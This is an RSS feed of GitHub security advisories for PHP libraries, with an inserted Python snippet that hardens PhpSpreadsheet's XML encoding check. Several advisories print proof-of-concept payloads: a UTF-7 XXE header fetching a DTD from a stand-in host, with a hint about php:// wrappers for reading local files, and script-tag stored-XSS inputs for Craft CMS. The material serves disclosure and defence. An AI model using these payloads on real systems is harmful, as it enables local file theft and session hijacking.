<lastBuildDate>Fri, 13 Sep 2024 16:32:36 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows an XXE attack, which in turn allows an attacker to obtain the contents of local files, even if error reporting is muted by the @ symbol (LFI attack).</p>
<h3 id="details">Details</h3>
<p>The check <code> $pattern = '/encoding="(.*?)"/';</code> is easy to bypass. Just use a single quote symbol <code>'</code>. So the payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file inside the xlsx-formatted file, such as the sharedStrings.xml file, then the XXE will execute.</p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> with</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>&lt;?php
// Loading the tampered workbook is enough: the reader parses xl/sharedStrings.xml
use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive a request to your <code>http://%webhook%/file.dtd</code></li>
<li>Don't forget that you can use PHP wrappers in the XXE; some php:// wrapper payloads allow fetching local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[damienharper/auditor-bundle] auditor-bundle vulnerable to Cross-site Scripting because name of entity does not get escaped</title>
<description><h3 id="summary">Summary</h3>
<p>Unescaped entity property enables Javascript injection.</p>
<h3 id="details">Details</h3>
<p>I think this is possible because %source_label% in the Twig macro is not escaped. Therefore script tags can be inserted and are executed.</p>
<h3 id="poc">PoC</h3>
<ul>
<li>clone example project <a href="https://github.com/DamienHarper/auditor-bundle-demo">https://github.com/DamienHarper/auditor-bundle-demo</a></li>
<li>create author with FullName </li>
<li>delete author</li>
<li>view audit of authors</li>
<li>alert is displayed</li>
</ul>
<h3 id="impact">Impact</h3>
<p>Persistent XSS: JS can be injected and executed.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67">https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67</a></li>
<li><a href="https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1">https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45592">https://nvd.nist.gov/vuln/detail/CVE-2024-45592</a></li>
<li><a href="https://github.com/advisories/GHSA-78vg-7v27-hj67">https://github.com/advisories/GHSA-78vg-7v27-hj67</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-78vg-7v27-hj67</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-78vg-7v27-hj67</guid>
<author>GitHub</author>
</item>
<item>
<title>[topthink/framework] ThinkPHP deserialization vulnerability</title>
<description><p>A deserialization vulnerability in Thinkphp v6.1.3 to v8.0.4 allows attackers to execute arbitrary code.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-44902">https://nvd.nist.gov/vuln/detail/CVE-2024-44902</a></li>
<li><a href="https://github.com/fru1ts/CVE-2024-44902">https://github.com/fru1ts/CVE-2024-44902</a></li>
<li><a href="http://thinkphp.com/">http://thinkphp.com</a></li>
<li><a href="https://github.com/advisories/GHSA-f4wh-359g-4pq7">https://github.com/advisories/GHSA-f4wh-359g-4pq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f4wh-359g-4pq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f4wh-359g-4pq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[craftcms/cms] Craft CMS vulnerable to stored XSS in breadcrumb list and title fields</title>
<description><h3 id="summary">Summary</h3>
<p>Multiple Stored XSS can be triggered by the breadcrumb list and title fields with user input.</p>
<h3 id="details">Details</h3>
<ol>
<li>In the <strong>/admin/categories</strong> page, the category title isn't sanitized and triggers XSS.</li>
<li>In the category edit page under <strong>/admin/categories/</strong>, the category title in the breadcrumb list isn't sanitized and triggers XSS.</li>
<li>In the <strong>/admin/entries</strong> page, the entry title isn't sanitized and triggers XSS.</li>
<li>In the entry edit page under <strong>/admin/entries/</strong>, the entry title in the breadcrumb list isn't sanitized and triggers XSS.</li>
<li>In <strong>/admin/myaccount</strong> and pages under it, the username or full name in the breadcrumb list isn't sanitized and triggers XSS.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Malicious users can tamper with the control panel.</p>
<h3 id="poc">PoC</h3>
<h4 id="1-in-the-admincategories-page-category-title-isnt-sanitized-and-triggered-xss">1. In the <strong>/admin/categories</strong> page, the category title isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access Settings -&gt; Categories ( /admin/settings/categories )
2. Create a new category group
3. Access the Categories page ( /admin/categories/ )
4. Push the New category button
5. Input in the Title column: xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Push the Create Category or Save button
7. Access the Categories page again and it triggers XSS
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/4e0f35c7-fbb0-4d38-a0b5-9e28750ff706" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e046b9db-d83c-4f81-ad91-165c5afedeb9" referrerpolicy="no-referrer"></p>
<h4 id="2-in-the-category-edit-page-under-the-admincategories-category-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">2. In the category edit page under <strong>/admin/categories/</strong>, the category title in the breadcrumb list isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access Settings -&gt; Categories ( /admin/settings/categories )
2. Create a new category group
3. Access the Categories page ( /admin/categories/ )
4. Push the New category button
5. Input in the Title column: xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Push the Create Category or Save button
7. Access the Category edit page again and it triggers XSS
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f7543a11-58eb-4099-9ee2-3461816c52ea" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f01bbb80-4417-42ca-bf51-b38860f6c74a" referrerpolicy="no-referrer"></p>
<h4 id="3-in-the-adminentries-page-entry-title-isnt-sanitized-and-triggered-xss">3. In the <strong>/admin/entries</strong> page, the entry title isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create a new entry type
3. Access Settings -&gt; Sections ( /admin/settings/sections )
4. Create a new section
5. Access the Entries page ( /admin/entries )
6. Push the New entry button
7. Input in the Title column: xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Push the Create entry or Save button
9. Access the Entries page again and it triggers XSS
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b255a999-e48c-46be-b732-4482ea9cee9a" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/445d8e0c-71b6-49c7-8f4a-37541dcc9c85" referrerpolicy="no-referrer"></p>
<h4 id="4-in-the-entry-edit-page-under-the-adminentries-entry-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">4. In the entry edit page under <strong>/admin/entries/</strong>, the entry title in the breadcrumb list isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create a new entry type
3. Access Settings -&gt; Sections ( /admin/settings/sections )
4. Create a new section
5. Access the Entries page ( /admin/entries )
6. Push the New entry button
7. Input in the Title column: xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Push the Create entry or Save button
9. Access the Entry edit page again and it triggers XSS
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a59a122b-b9e7-4695-be13-eb8a1c2d36df" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b0d27446-7ac6-47e7-ac02-20c924698b13" referrerpolicy="no-referrer"></p>
<h4 id="5-in-the-adminmyaccount-and-pages-under-it-username-or-full-name-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">5. In <strong>/admin/myaccount</strong> and pages under it, the username or full name in the breadcrumb list isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access the My Account page ( /admin/myaccount )
2. Input in the Full Name column: xss&lt;script&gt;alert('xss')&lt;/script&gt;
3. Push the Save button
4. Access the My Account page ( /admin/myaccount ) or pages under it ( /admin/myaccount/addresses , /admin/myaccount/preferences , etc.) and it triggers XSS
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/3be45bdd-0757-42a8-bc5d-320ab2339fd0" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e1be7446-1c54-42bc-af9a-a8ac81a2d7bf" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/5fa06b26-fecd-40f5-bc8b-171f881f8a2a" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42">https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42</a></li>
<li><a href="https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8">https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45406">https://nvd.nist.gov/vuln/detail/CVE-2024-45406</a></li>
<li><a href="https://github.com/advisories/GHSA-28h4-788g-rh42">https://github.com/advisories/GHSA-28h4-788g-rh42</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-28h4-788g-rh42</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-28h4-788g-rh42</guid>
<author>GitHub</author>
</item>
<item>
<title>[nategood/httpful] Httpful is Missing Certificate Validation</title>
<description><p>Httpful has Insecure HTTPS Connections due to Missing Default Certificate Validation</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/nategood/httpful/issues/247">https://github.com/nategood/httpful/issues/247</a></li>
<li><a href="https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84">https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84</a></li>
<li><a href="https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml">https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml</a></li>
<li><a href="https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35">https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35</a></li>
<li><a href="https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb">https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb</a></li>
<li><a href="https://github.com/advisories/GHSA-gcfg-hmwx-wq5h">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</guid>
<author>GitHub</author>
</item>
<item>
<title>[twbs/bootstrap] Bootstrap Cross-Site Scripting (XSS) vulnerability</title>
<description><p>A vulnerability has been identified in Bootstrap that exposes users to Cross-Site Scripting (XSS) attacks. The issue is present in the carousel component, where the data-slide and data-slide-to attributes can be exploited through the href attribute of an &lt;a&gt; tag due to inadequate sanitization. This vulnerability could potentially enable attackers to execute arbitrary JavaScript within the victim's browser.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-6531">https://nvd.nist.gov/vuln/detail/CVE-2024-6531</a></li>
<li><a href="https://www.herodevs.com/vulnerability-directory/cve-2024-6531">https://www.herodevs.com/vulnerability-directory/cve-2024-6531</a></li>
<li><a href="https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml">https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml</a></li>
<li><a href="https://github.com/advisories/GHSA-vc8w-jr9v-vj7f">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</guid>
<author>GitHub</author>
</item>
<item>
<title>[reportico-web/reportico] SQL Injection vulnerability in Reportico Till</title>
<description><p>SQL Injection vulnerability in Reportico Till 8.1.0 allows attackers to obtain sensitive information or other system information via the project parameter.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-47438">https://nvd.nist.gov/vuln/detail/CVE-2023-47438</a></li>
<li><a href="https://github.com/reportico-web/reportico/issues/52">https://github.com/reportico-web/reportico/issues/52</a></li>
<li><a href="https://github.com/advisories/GHSA-jjf4-959w-f545">https://github.com/advisories/GHSA-jjf4-959w-f545</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jjf4-959w-f545</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jjf4-959w-f545</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information</title>
<description><h3 id="summary">Summary</h3>
<p><code>\PhpOffice\PhpSpreadsheet\Writer\Html</code> doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page.</p>
<h3 id="poc">PoC</h3>
<p>Example target script:</p>
<pre><code>&lt;?php
require 'vendor/autoload.php';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader-&gt;load(__DIR__ . '/book.xlsx');
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer-&gt;generateHTMLAll());
</code></pre>
<p>Save this file in the same directory:
<a href="https://github.com/PHPOffice/PhpSpreadsheet/files/15212797/book.xlsx">book.xlsx</a></p>
<p>Open index.php in a web browser. An alert should be displayed.</p>
<h3 id="impact">Impact</h3>
<p>Full takeover of the session of users viewing spreadsheet files as HTML.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45046">https://nvd.nist.gov/vuln/detail/CVE-2024-45046</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/pull/3957">https://github.com/PHPOffice/PhpSpreadsheet/pull/3957</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667">https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667</a></li>
<li><a href="https://github.com/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wgmf-q9vr-vww6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows an XXE attack, which in turn allows an attacker to obtain the contents of local files, even if error reporting is muted by the @ symbol (LFI attack).</p>
<h3 id="details">Details</h3>
<p>The check <code> $pattern = '/encoding="(.*?)"/';</code> is easy to bypass: just use a single quote symbol <code>'</code>. So the payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file inside the xlsx-formatted file, such as the sharedStrings.xml file, then the XXE will execute.</p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> with</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal PHP code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive a request to your <code>http://%webhook%/file.dtd</code></li>
<li>Don't forget that you can use PHP wrappers in the XXE; some php:// wrapper payloads allow fetching local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
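The encoding-check bypass from the PhpSpreadsheet XXE advisory above (GHSA-ghg6-32f9-2jp7), as an added example that is not part of the feed output or of PhpSpreadsheet's code. It is written in Python because the quoted check is a plain regular expression that behaves the same under PCRE and Python's `re`; the hardened pattern, the encoding allowlist and the sample `sharedStrings.xml` parts are my own constructions rather than the project's patch, and the payload line is the UTF-7 header quoted in the advisory.

```python
from __future__ import annotations

import codecs
import re

# The check quoted in the advisory (PCRE in the original; Python's re gives the
# same result for this pattern): it only recognises a double-quoted attribute.
VULNERABLE_ENCODING_RE = re.compile(r'encoding="(.*?)"')

# Hardened variant (my own, not the project's patch): anchored to the XML
# declaration, accepts either quote style, case-insensitive.
HARDENED_ENCODING_RE = re.compile(
    r'<\?xml[^>]*?\sencoding\s*=\s*(["\'])(.*?)\1', re.IGNORECASE
)

# Encodings a workbook part may declare; UTF-7 and other encodings that can
# hide '<' from a byte-level scan are rejected outright (assumed allowlist).
ALLOWED_ENCODINGS = {"utf-8", "utf-16", "utf-16le", "utf-16be"}

# Any DTD markup is refused: a spreadsheet part never legitimately needs one.
DTD_MARKUP_RE = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def vulnerable_declared_encoding(part: bytes) -> str | None:
    """What the original check sees: None for a single-quoted declaration."""
    m = VULNERABLE_ENCODING_RE.search(part.decode("latin-1"))
    return m.group(1) if m else None


def hardened_declared_encoding(part: bytes) -> str | None:
    m = HARDENED_ENCODING_RE.search(part.decode("latin-1"))
    return m.group(2) if m else None


def decode_with_declared_encoding(part: bytes) -> str:
    """Decode the part the way an XML parser would, honouring the declaration."""
    return codecs.decode(part, hardened_declared_encoding(part) or "utf-8")


def is_safe_part(part: bytes) -> bool:
    """Accept a part only if its declared encoding is allowlisted, it decodes
    cleanly, and the decoded text contains no DOCTYPE or ENTITY declaration."""
    enc = hardened_declared_encoding(part)
    if enc is not None and enc.lower() not in ALLOWED_ENCODINGS:
        return False
    try:
        text = decode_with_declared_encoding(part)
    except (LookupError, UnicodeDecodeError):
        return False
    return DTD_MARKUP_RE.search(text) is None


# Constructed samples: a benign sharedStrings.xml header, the advisory's UTF-7
# payload (+ADw- is the UTF-7 spelling of '<'), and a plain UTF-8 part that
# carries an inline external entity.
BENIGN_PART = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    b'<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
    b"<si><t>hello</t></si></sst>"
)
UTF7_XXE_PART = (
    b"<?xml version=\"1.0\" encoding='UTF-7' standalone=\"yes\"?>\n"
    b'+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]>\n'
)
INLINE_ENTITY_PART = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE sst [<!ENTITY e SYSTEM "file:///etc/hostname">]><sst>&e;</sst>'
)
```

The vulnerable pattern returns nothing for the single-quoted declaration, so the part is passed on as if it were plain UTF-8 and the `+ADw-` sequences only become `<!DOCTYPE` inside the XML parser. The hardened path reads either quote style, refuses non-allowlisted encodings before decoding, and rejects any DTD markup after decoding, which also catches the UTF-8 part with an inline entity that no encoding check alone would stop.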
<item>
<title>[pimcore/pimcore] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
